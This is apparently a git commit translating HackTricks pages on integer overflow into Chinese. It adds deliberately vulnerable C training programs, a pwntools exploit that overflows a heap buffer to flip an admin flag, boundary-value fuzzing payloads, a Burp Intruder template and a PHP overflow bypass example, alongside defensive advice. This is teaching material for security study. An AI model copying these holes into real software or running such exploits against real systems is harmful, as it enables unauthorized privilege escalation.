Translated ['src/pentesting-web/xss-cross-site-scripting/integer-overflo

This commit is contained in:
Translator 2025-09-07 14:59:06 +00:00
parent d9aa513a99
commit 316e14aa78
4 changed files with 409 additions and 155 deletions

View File

@ -785,7 +785,7 @@
- [Windows Seh Overflow](binary-exploitation/stack-overflow/windows-seh-overflow.md)
- [Array Indexing](binary-exploitation/array-indexing.md)
- [Chrome Exploiting](binary-exploitation/chrome-exploiting.md)
- [Integer Overflow](binary-exploitation/integer-overflow.md)
- [Integer Overflow](binary-exploitation/integer-overflow-and-underflow.md)
- [Format Strings](binary-exploitation/format-strings/README.md)
- [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
- [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)

View File

@ -0,0 +1,368 @@
# Integer Overflow
{{#include ../banners/hacktricks-training.md}}
## 基本信息
在**integer overflow** 的核心是计算机编程中数据类型的**大小**限制以及对数据的**解释**。
例如,一个**8-bit unsigned integer**可以表示从**0 到 255**的数值。如果你试图把 256 存入一个 8-bit unsigned integer由于存储容量的限制它会回绕到 0。类似地**16-bit unsigned integer**可以表示**0 到 65,535**,对 65,535 加 1 会使值回绕到 0。
此外,一个**8-bit signed integer**可以表示从**-128 到 127**的数值。这是因为一位用于表示符号(正或负),剩下的 7 位用于表示数值大小。最小的负数表示为 **-128**(二进制 `10000000`),而最大的正数为 **127**(二进制 `01111111`)。
常见整数类型的取值范围:
| 类型 | 大小bits | 最小值 | 最大值 |
|----------------|-------------|--------------------|--------------------|
| int8_t | 8 | -128 | 127 |
| uint8_t | 8 | 0 | 255 |
| int16_t | 16 | -32,768 | 32,767 |
| uint16_t | 16 | 0 | 65,535 |
| int32_t | 32 | -2,147,483,648 | 2,147,483,647 |
| uint32_t | 32 | 0 | 4,294,967,295 |
| int64_t | 64 | -9,223,372,036,854,775,808 | 9,223,372,036,854,775,807 |
| uint64_t | 64 | 0 | 18,446,744,073,709,551,615 |
在 64 位系统中short 等价于 `int16_t`int 等价于 `int32_t`long 等价于 `int64_t`
### 最大值
对于潜在的 **web vulnerabilities**,了解最大支持值非常重要:
{{#tabs}}
{{#tab name="Rust"}}
```rust
fn main() {
let mut quantity = 2147483647;
let (mul_result, _) = i32::overflowing_mul(32767, quantity);
let (add_result, _) = i32::overflowing_add(1, quantity);
println!("{}", mul_result);
println!("{}", add_result);
}
```
{{#endtab}}
{{#tab name="C"}}
```c
#include <stdio.h>
#include <limits.h>
int main() {
int a = INT_MAX;
int b = 0;
int c = 0;
b = a * 100;
c = a + 1;
printf("%d\n", INT_MAX);
printf("%d\n", b);
printf("%d\n", c);
return 0;
}
```
{{#endtab}}
{{#endtabs}}
## 示例
### 纯溢出
打印结果将是 0因为我们使 char 溢出:
```c
#include <stdio.h>
int main() {
unsigned char max = 255; // 8-bit unsigned integer
unsigned char result = max + 1;
printf("Result: %d\n", result); // Expected to overflow
return 0;
}
```
### Signed to Unsigned Conversion
考虑一种情况:从用户输入读取一个有符号整数,然后在将其视为无符号整数的上下文中使用,且没有进行适当验证:
```c
#include <stdio.h>
int main() {
int userInput; // Signed integer
printf("Enter a number: ");
scanf("%d", &userInput);
// Treating the signed input as unsigned without validation
unsigned int processedInput = (unsigned int)userInput;
// A condition that might not work as intended if userInput is negative
if (processedInput > 1000) {
printf("Processed Input is large: %u\n", processedInput);
} else {
printf("Processed Input is within range: %u\n", processedInput);
}
return 0;
}
```
在这个示例中,如果用户输入一个负数,由于二进制值的解释方式,它会被解释为一个大的无符号整数,可能导致意外行为。
### macOS 溢出示例
```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
/*
* Realistic integer-overflow → undersized allocation → heap overflow → flag
* Works on macOS arm64 (no ret2win required; avoids PAC/CFI).
*/
__attribute__((noinline))
void win(void) {
puts("🎉 EXPLOITATION SUCCESSFUL 🎉");
puts("FLAG{integer_overflow_to_heap_overflow_on_macos_arm64}");
exit(0);
}
struct session {
int is_admin; // Target to flip from 0 → 1
char note[64];
};
static size_t read_stdin(void *dst, size_t want) {
// Read in bounded chunks to avoid EINVAL on large nbyte (macOS PTY/TTY)
const size_t MAX_CHUNK = 1 << 20; // 1 MiB per read (any sane cap is fine)
size_t got = 0;
printf("Requested bytes: %zu\n", want);
while (got < want) {
size_t remain = want - got;
size_t chunk = remain > MAX_CHUNK ? MAX_CHUNK : remain;
ssize_t n = read(STDIN_FILENO, (char*)dst + got, chunk);
if (n > 0) {
got += (size_t)n;
continue;
}
if (n == 0) {
// EOF stop; partial reads are fine for our exploit
break;
}
// n < 0: real error (likely EINVAL when chunk too big on some FDs)
perror("read");
break;
}
return got;
}
int main(void) {
setvbuf(stdout, NULL, _IONBF, 0);
puts("=== Bundle Importer (training) ===");
// 1) Read attacker-controlled parameters (use large values)
size_t count = 0, elem_size = 0;
printf("Entry count: ");
if (scanf("%zu", &count) != 1) return 1;
printf("Entry size: ");
if (scanf("%zu", &elem_size) != 1) return 1;
// 2) Compute total bytes with a 32-bit truncation bug (vulnerability)
// NOTE: 'product32' is 32-bit → wraps; then we add a tiny header.
uint32_t product32 = (uint32_t)(count * elem_size);//<-- Integer overflow because the product is converted to 32-bit.
/* So if you send "4294967296" (0x1_00000000 as count) and 1 as element --> 0x1_00000000 * 1 = 0 in 32bits
Then, product32 = 0
*/
uint32_t alloc32 = product32 + 32; // alloc32 = 0 + 32 = 32
printf("[dbg] 32-bit alloc = %u bytes (wrapped)\n", alloc32);
// 3) Allocate a single arena and lay out [buffer][slack][session]
// This makes adjacency deterministic (no reliance on system malloc order).
const size_t SLACK = 512;
size_t arena_sz = (size_t)alloc32 + SLACK; // 32 + 512 = 544 (0x220)
unsigned char *arena = (unsigned char*)malloc(arena_sz);
if (!arena) { perror("malloc"); return 1; }
memset(arena, 0, arena_sz);
unsigned char *buf = arena; // In this buffer the attacker will copy data
struct session *sess = (struct session*)(arena + (size_t)alloc32 + 16); // The session is stored right after the buffer + alloc32 (32) + 16 = buffer + 48
sess->is_admin = 0;
strncpy(sess->note, "regular user", sizeof(sess->note)-1);
printf("[dbg] arena=%p buf=%p alloc32=%u sess=%p offset_to_sess=%zu\n",
(void*)arena, (void*)buf, alloc32, (void*)sess,
((size_t)alloc32 + 16)); // This just prints the address of the pointers to see that the distance between "buf" and "sess" is 48 (32 + 16).
// 4) Copy uses native size_t product (no truncation) → It generates an overflow
size_t to_copy = count * elem_size; // <-- Large size_t
printf("[dbg] requested copy (size_t) = %zu\n", to_copy);
puts(">> Send bundle payload on stdin (EOF to finish)...");
size_t got = read_stdin(buf, to_copy); // <-- Heap overflow vulnerability that can bue abused to overwrite sess->is_admin to 1
printf("[dbg] actually read = %zu bytes\n", got);
// 5) Privileged action gated by a field next to the overflow target
if (sess->is_admin) {
puts("[dbg] admin privileges detected");
win();
} else {
puts("[dbg] normal user");
}
return 0;
}
```
使用以下命令编译:
```bash
clang -O0 -Wall -Wextra -std=c11 -D_FORTIFY_SOURCE=0 \
-o int_ovf_heap_priv int_ovf_heap_priv.c
```
#### Exploit
```python
# exploit.py
from pwn import *
# Keep logs readable; switch to "debug" if you want full I/O traces
context.log_level = "info"
EXE = "./int_ovf_heap_priv"
def main():
# IMPORTANT: use plain pipes, not PTY
io = process([EXE]) # stdin=PIPE, stdout=PIPE by default
# 1) Drive the prompts
io.sendlineafter(b"Entry count: ", b"4294967296") # 2^32 -> (uint32_t)0
io.sendlineafter(b"Entry size: ", b"1") # alloc32 = 32, offset_to_sess = 48
# 2) Wait until its actually reading the payload
io.recvuntil(b">> Send bundle payload on stdin (EOF to finish)...")
# 3) Overflow 48 bytes, then flip is_admin to 1 (little-endian)
payload = b"A" * 48 + p32(1)
# 4) Send payload, THEN send EOF via half-close on the pipe
io.send(payload)
io.shutdown("send") # <-- this delivers EOF when using pipes, it's needed to stop the read loop from the binary
# 5) Read the rest (should print admin + FLAG)
print(io.recvall(timeout=5).decode(errors="ignore"))
if __name__ == "__main__":
main()
```
### macOS Underflow 示例
```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
/*
* Integer underflow -> undersized allocation + oversized copy -> heap overwrite
* Works on macOS arm64. Data-oriented exploit: flip sess->is_admin.
*/
__attribute__((noinline))
void win(void) {
puts("🎉 EXPLOITATION SUCCESSFUL 🎉");
puts("FLAG{integer_underflow_heap_overwrite_on_macos_arm64}");
exit(0);
}
struct session {
int is_admin; // flip 0 -> 1
char note[64];
};
static size_t read_stdin(void *dst, size_t want) {
// Read in bounded chunks so huge 'want' doesn't break on PTY/TTY.
const size_t MAX_CHUNK = 1 << 20; // 1 MiB
size_t got = 0;
printf("[dbg] Requested bytes: %zu\n", want);
while (got < want) {
size_t remain = want - got;
size_t chunk = remain > MAX_CHUNK ? MAX_CHUNK : remain;
ssize_t n = read(STDIN_FILENO, (char*)dst + got, chunk);
if (n > 0) { got += (size_t)n; continue; }
if (n == 0) break; // EOF: partial read is fine
perror("read"); break;
}
return got;
}
int main(void) {
setvbuf(stdout, NULL, _IONBF, 0);
puts("=== Packet Importer (UNDERFLOW training) ===");
size_t total_len = 0;
printf("Total packet length: ");
if (scanf("%zu", &total_len) != 1) return 1; // Suppose it's "8"
const size_t HEADER = 16;
// **BUG**: size_t underflow if total_len < HEADER
size_t payload_len = total_len - HEADER; // <-- UNDERFLOW HERE if total_len < HEADER --> Huge number as it's unsigned
// If total_len = 8, payload_len = 8 - 16 = -8 = 0xfffffffffffffff8 = 18446744073709551608 (on 64bits - huge number)
printf("[dbg] total_len=%zu, HEADER=%zu, payload_len=%zu\n",
total_len, HEADER, payload_len);
// Build a deterministic arena: [buf of total_len][16 gap][session][slack]
const size_t SLACK = 256;
size_t arena_sz = total_len + 16 + sizeof(struct session) + SLACK; // 8 + 16 + 72 + 256 = 352 (0x160)
unsigned char *arena = (unsigned char*)malloc(arena_sz);
if (!arena) { perror("malloc"); return 1; }
memset(arena, 0, arena_sz);
unsigned char *buf = arena;
struct session *sess = (struct session*)(arena + total_len + 16);
// The offset between buf and sess is total_len + 16 = 8 + 16 = 24 (0x18)
sess->is_admin = 0;
strncpy(sess->note, "regular user", sizeof(sess->note)-1);
printf("[dbg] arena=%p buf=%p total_len=%zu sess=%p offset_to_sess=%zu\n",
(void*)arena, (void*)buf, total_len, (void*)sess, total_len + 16);
puts(">> Send payload bytes (EOF to finish)...");
size_t got = read_stdin(buf, payload_len);
// The offset between buf and sess is 24 and the payload_len is huge so we can overwrite sess->is_admin to set it as 1
printf("[dbg] actually read = %zu bytes\n", got);
if (sess->is_admin) {
puts("[dbg] admin privileges detected");
win();
} else {
puts("[dbg] normal user");
}
return 0;
}
```
使用以下命令编译:
```bash
clang -O0 -Wall -Wextra -std=c11 -D_FORTIFY_SOURCE=0 \
-o int_underflow_heap int_underflow_heap.c
```
### Other Examples
- [https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html)
- 密码长度只用 1B 存储,因此可以溢出它,使它认为长度为 4而实际上为 260从而绕过长度检查保护
- [https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html)
- 给定几个数字,使用 z3 找出一个新的数字,使得该数字乘以第一个数等于第二个数:
```
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)
```
- [https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/)
- 密码长度只用 1B 存储,因此可以溢出它,使它认为长度为 4而实际上为 260从而绕过长度检查保护并在栈上覆盖下一个局部变量从而绕过两个保护措施
## ARM64
这一点 **doesn't change in ARM64**,正如你可以在 [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/) 中看到的。
{{#include ../banners/hacktricks-training.md}}

View File

@ -1,115 +0,0 @@
# 整数溢出
{{#include ../banners/hacktricks-training.md}}
## 基本信息
在**整数溢出**的核心是计算机编程中数据类型的**大小**所施加的限制和数据的**解释**。
例如,一个**8位无符号整数**可以表示从**0到255**的值。如果你尝试在8位无符号整数中存储值256由于其存储容量的限制它会回绕到0。同样对于一个**16位无符号整数**,它可以容纳从**0到65,535**的值将1加到65,535会将值回绕到0。
此外,一个**8位有符号整数**可以表示从**-128到127**的值。这是因为一个位用于表示符号正或负剩下7个位用于表示大小。最小的负数表示为**-128**(二进制`10000000`),最大的正数是**127**(二进制`01111111`)。
### 最大值
对于潜在的**网络漏洞**,了解最大支持值是非常有趣的:
{{#tabs}}
{{#tab name="Rust"}}
```rust
fn main() {
let mut quantity = 2147483647;
let (mul_result, _) = i32::overflowing_mul(32767, quantity);
let (add_result, _) = i32::overflowing_add(1, quantity);
println!("{}", mul_result);
println!("{}", add_result);
}
```
{{#endtab}}
{{#tab name="C"}}
```c
#include <stdio.h>
#include <limits.h>
int main() {
int a = INT_MAX;
int b = 0;
int c = 0;
b = a * 100;
c = a + 1;
printf("%d\n", INT_MAX);
printf("%d\n", b);
printf("%d\n", c);
return 0;
}
```
{{#endtab}}
{{#endtabs}}
## 示例
### 纯溢出
打印的结果将是 0因为我们溢出了 char
```c
#include <stdio.h>
int main() {
unsigned char max = 255; // 8-bit unsigned integer
unsigned char result = max + 1;
printf("Result: %d\n", result); // Expected to overflow
return 0;
}
```
### Signed to Unsigned Conversion
考虑一种情况,其中从用户输入读取一个有符号整数,然后在一个将其视为无符号整数的上下文中使用,而没有进行适当的验证:
```c
#include <stdio.h>
int main() {
int userInput; // Signed integer
printf("Enter a number: ");
scanf("%d", &userInput);
// Treating the signed input as unsigned without validation
unsigned int processedInput = (unsigned int)userInput;
// A condition that might not work as intended if userInput is negative
if (processedInput > 1000) {
printf("Processed Input is large: %u\n", processedInput);
} else {
printf("Processed Input is within range: %u\n", processedInput);
}
return 0;
}
```
在这个例子中,如果用户输入一个负数,由于二进制值的解释方式,它将被解释为一个大的无符号整数,这可能导致意外行为。
### 其他示例
- [https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html)
- 仅使用 1B 来存储密码的大小,因此可能会溢出并使其认为长度为 4而实际上是 260以绕过长度检查保护
- [https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html)
- 给定几个数字,使用 z3 找出一个新数字,使其与第一个数字相乘得到第二个数字:
```
(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569)
```
- [https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/)
- 仅使用 1B 来存储密码的大小,因此可能会溢出并使其认为长度为 4而实际上是 260以绕过长度检查保护并在栈中覆盖下一个局部变量从而绕过这两种保护
## ARM64
这在 ARM64 中**没有变化**,正如你在 [**这篇博客文章**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/)中看到的。
{{#include ../banners/hacktricks-training.md}}

View File

@ -1,38 +1,37 @@
# 整数溢出Web 应用程序
# 整数溢出Web 应用)
{{#include ../../banners/hacktricks-training.md}}
> 本页面重点介绍如何在 **Web 应用程序和浏览器中滥用整数溢出/截断**。有关本地二进制文件中的利用原语,您可以继续阅读专门的页面:
> 本页侧重于说明**如何在 Web 应用和浏览器中滥用整数溢出/截断**。对于本地二进制native binaries中的 exploitation primitives你可以继续阅读专门页面:
>
>
{{#ref}}
> ../../binary-exploitation/integer-overflow-and-underflow.md
>
{{#endref}}
> {{#endref}}
---
## 1. 为什么整数数学在 Web 上仍然重要
## 1. 为什么整数运算在 Web 上仍然重要
尽管现代堆栈中的大多数业务逻辑是用 *内存安全* 语言编写的,但底层运行时(或第三方库)最终是用 C/C++ 实现的。每当使用用户控制的数字来分配缓冲区、计算偏移量或执行长度检查时,**32 位或 64 位的环绕可能会将一个看似无害的参数转变为越界读/写、逻辑绕过或拒绝服务DoS**。
尽管现代技术栈的大多数业务逻辑都是用 *memory-safe* 语言编写,但底层运行时(或第三方库)最终仍然由 C/C++ 实现。每当用户可控的数值用于分配缓冲区、计算偏移或执行长度检查时,**32 位或 64 位的环绕wrap-around可能会把一个看似无害的参数转变为越界读/写、逻辑绕过或 DoS**。
典型攻击面:
1. **数字请求参数** 经典的 id、偏移量或计数字段。
2. **长度/大小头部** Content-Length、WebSocket 帧长度、HTTP/2 continuation_len 等。
3. **服务器端或客户端解析的文件格式元数据** 图像尺寸、块大小、字体表
4. **语言级转换** PHP/Go/Rust FFI 中的有符号↔无符号转换V8 中的 JS Number → int32 截断。
5. **身份验证和业务逻辑** 优惠券值、价格或余额计算静默溢出。
1. **Numeric request parameters** 典型的 id、offset 或 count 字段。
2. **Length / size headers** Content-Length、WebSocket frame length、HTTP/2 continuation_len 等。
3. **File-format metadata parsed server-side or client-side** image dimensions、chunk sizes、font tables
4. **Language-level conversions** PHP/Go/Rust FFI 中的 signed↔unsigned castsJS Number → int32 在 V8 内部的截断。
5. **Authentication & business logic** 优惠券值、价格或余额计算在无提示情况下溢出。
---
## 2. 最近的实世界漏洞2023-2025
## 2. 最近的实世界漏洞2023-2025
| 年份 | 组件 | 根本原因 | 影响 |
| Year | Component | Root cause | Impact |
|------|-----------|-----------|--------|
| 2023 | **libwebp CVE-2023-4863** | 计算解码像素大小时的 32 位乘法溢出 | 触发了 Chrome 0-dayiOS 上的 BLASTPASS允许在渲染器沙箱内 *远程代码执行* |
| 2024 | **V8 CVE-2024-0519** | 在增长 JSArray 时截断为 32 位导致对后备存储的越界写入 | 单次访问后远程代码执行。 |
| 2025 | **Apollo GraphQL 服务器**(未发布补丁) | 用于第一页/最后一页分页参数的 32 位有符号整数;负值环绕到巨大的正值 | 逻辑绕过和内存耗尽DoS |
| 2023 | **libwebp CVE-2023-4863** | 32-bit multiplication overflow when computing decoded pixel size | Triggered a Chrome 0-day (BLASTPASS on iOS), allowed *remote code execution* inside the renderer sandbox. |
| 2024 | **V8 CVE-2024-0519** | Truncation to 32-bit when growing a JSArray leads to OOB write on the backing store | Remote code execution after a single visit. |
| 2025 | **Apollo GraphQL Server** (unreleased patch) | 32-bit signed integer used for first/last pagination args; negative values wrap to huge positives | Logic bypass & memory exhaustion (DoS). |
---
@ -40,7 +39,7 @@
### 3.1 边界值备忘单
期望整数的地方发送 **极端的有符号/无符号值**
任何期望整数的位置发送 **极端的有符号/无符号值**
```
-1, 0, 1,
127, 128, 255, 256,
@ -50,27 +49,27 @@
0x7fffffff, 0x80000000, 0xffffffff
```
其他有用的格式:
* 十六进制 (0x100),八进制 (0377),科学计数法 (1e10)JSON 大整数 (9999999999999999999)。
* 非常长的数字字符串 (>1kB) 触发自定义解析器。
* Hex (0x100), octal (0377), scientific (1e10), JSON big-int (9999999999999999999).
* 非常长的数字字符串 (>1kB) 用于触发自定义解析器。
### 3.2 Burp Intruder 模板
### 3.2 Burp Intruder template
```
§INTEGER§
Payload type: Numbers
From: -10 To: 4294967300 Step: 1
Pad to length: 10, Enable hex prefix 0x
```
### 3.3 模糊测试库和运行时
### 3.3 Fuzzing libraries & runtimes
* **AFL++/Honggfuzz** 与 libFuzzer 结合使用,围绕解析器(例如,WebP、PNG、protobuf
* **Fuzzilli** 语法感知的 JavaScript 引擎模糊测试,以触及 V8/JSC 整数截断。
* **boofuzz** 网络协议模糊测试WebSocket、HTTP/2重点关注长度字段。
* **AFL++/Honggfuzz** 使用 libFuzzer harness 围绕解析器(例如 WebP、PNG、protobuf
* **Fuzzilli** 基于语法的 fuzzing JavaScript 引擎,以触发 V8/JSC 的整数截断。
* **boofuzz** 网络协议 fuzzingWebSocket、HTTP/2聚焦长度字段。
---
## 4. 利用模式
## 4. Exploitation patterns
### 4.1 服务器端代码中的逻辑绕过PHP 示例)
### 4.1 Logic bypass in server-side code (PHP example)
```php
$price = (int)$_POST['price']; // expecting cents (0-10000)
$total = $price * 100; // ← 32-bit overflow possible
@ -79,28 +78,30 @@ die('Too expensive');
}
/* Sending price=21474850 → $total wraps to 2147483648 and check is bypassed */
```
### 4.2 通过图像解码器的堆溢出 (libwebp 0-day)
WebP 无损解码器在 32 位整数内将图像宽度 × 高度 × 4 (RGBA) 相乘。一个尺寸为 16384 × 16384 的精心制作的文件会导致乘法溢出,分配一个短缓冲区,并随后将 **~1GB** 的解压数据写入堆中 导致在 116.0.5845.187 之前的每个基于 Chromium 的浏览器中发生 RCE。
### 4.2 Heap overflow via image decoder (libwebp 0-day)
WebP 无损解码器在 32-bit int 中将 image width × height × 4 (RGBA) 相乘。一个尺寸为 16384 × 16384 的精心构造文件会使乘法溢出,分配一个较小的缓冲区,并随后将 **~1GB** 的解压数据写出堆边界,导致在 116.0.5845.187 之前的所有 Chromium-based 浏览器出现 RCE。
### 4.3 基于浏览器的 XSS/RCE 链
1. **整数溢出** 在 V8 中提供任意读/写。
2. 通过第二个漏洞逃逸沙箱或调用本地 API 以投放有效载荷
3. 有效载荷随后将恶意脚本注入原始上下文 → 存储的 XSS。
1. **Integer overflow** in V8 gives arbitrary read/write.
2. 通过第二个漏洞越出沙箱,或调用本地 API 来 drop a payload
3. 然后 payload 将恶意脚本注入 origin context → 造成 stored XSS。
---
## 5. 防御指南
1. **使用宽类型或检查数学** 例如size_t、Rust checked_add、Go math/bits.Add64。
2. **尽早验证范围**:在算术运算之前拒绝任何超出业务范围的值。
3. **启用编译器消毒器**-fsanitize=integer, UBSan, Go race detector。
4. **在 CI/CD 中采用模糊测试** 将覆盖反馈与边界语料库结合。
5. **保持补丁更新** 浏览器整数溢出漏洞通常在几周内被利用
1. **Use wide types or checked math** 例如 size_t、Rust 的 checked_add、Go 的 math/bits.Add64。
2. **Validate ranges early**:在算术运算前拒绝任何超出业务域的值。
3. **Enable compiler sanitizers**-fsanitize=integer、UBSan、Go race detector。
4. **Adopt fuzzing in CI/CD** 将覆盖率反馈与边界语料结合。
5. **Stay patched** 浏览器中的 integer overflow 漏洞常在数周内被 weaponised
---
## 参考文献
* [NVD CVE-2023-4863 libwebp 堆缓冲区溢出](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)
* [Google Project Zero "理解 V8 CVE-2024-0519"](https://googleprojectzero.github.io/)
## References
* [NVD CVE-2023-4863 libwebp Heap Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2023-4863)
* [Google Project Zero "Understanding V8 CVE-2024-0519"](https://googleprojectzero.github.io/)
{{#include ../../banners/hacktricks-training.md}}